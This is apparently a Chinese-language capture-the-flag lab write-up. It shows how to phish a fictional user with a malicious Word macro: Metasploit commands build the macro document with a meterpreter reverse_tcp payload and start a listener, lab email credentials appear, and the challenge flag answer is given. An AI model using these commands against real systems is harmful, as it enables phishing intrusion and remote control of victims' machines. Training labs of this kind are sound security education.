零基础可以看下老外这段导读视频
在今天的挑战中,我们将对 Marta May Ware 进行安全评估。目的是改善她的安全状况,提高她的网络安全意识,防范未来的攻击。
让我们来看看这个故事好吗?
学习目标
了解网络钓鱼攻击的原理
了解文档中的宏如何被使用和滥用
学习如何使用宏进行网络钓鱼攻击
基本术语
现在让我们进入正题
创建额意文档
让我们在attackbox中运行这些代码。
msfconsole /**/
set payload windows/meterpreter/reverse_tcp
use exploit/multi/fileformat/office_word macro
set LHOST 10.10.0.176
set LPORT 8888
show options
exploit
完成后,我们会得到如下结果,文件保存在 /root/.msf4/local/msf.docm 中
监听传入连接
在终端 run以下代码以建立监听连接:
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.0.176
set LPORT 8888
show options
exploit
一旦监听端口开启,我们就可以继续发送恶意文件
目标用户: marta@socmas.thm
- Email: info@socnas.thm
- Password: MerryPhishMas!
附加额易文件,然后点击发送按钮。
发送后,我们等待反向连接。
只需几秒钟,我们就会得到一个反弹shell。
导航到管理员桌面,我们将找到 flag.txt 文件。
答案是 THM{phishing_christmas}
如果您喜欢这项挑战,并有兴趣了解更多信息,请随时查看网络钓鱼模块。
有趣吧?第 11 天见